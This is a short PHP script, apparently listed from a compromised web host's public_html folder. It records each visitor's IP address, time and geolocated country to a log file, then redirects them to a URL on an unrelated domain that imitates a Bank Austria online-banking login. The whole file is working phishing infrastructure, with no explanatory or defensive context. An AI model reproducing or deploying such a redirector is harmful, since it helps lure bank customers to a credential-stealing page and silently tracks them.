Current File : /home/itiffy/public_html/bb.php
<?php

$ip =getenv("REMOTE_ADDR");
$u_agent = $_SERVER['HTTP_USER_AGENT']; 
$ipdat = @json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=".$ip)); 
$dateNow = date("d/m/Y h:i:s A");    
$file = fopen("vu.txt","a");
fwrite($file,$ip." | ".$dateNow." | ".$ipdat->geoplugin_countryName."\n");

header("Location: https://cryptoexchangeplc.com/.tmp/bankaustria-online-banking-xml_id=at-AT-loginAll/?pwd=bankaustria");
exit();
?>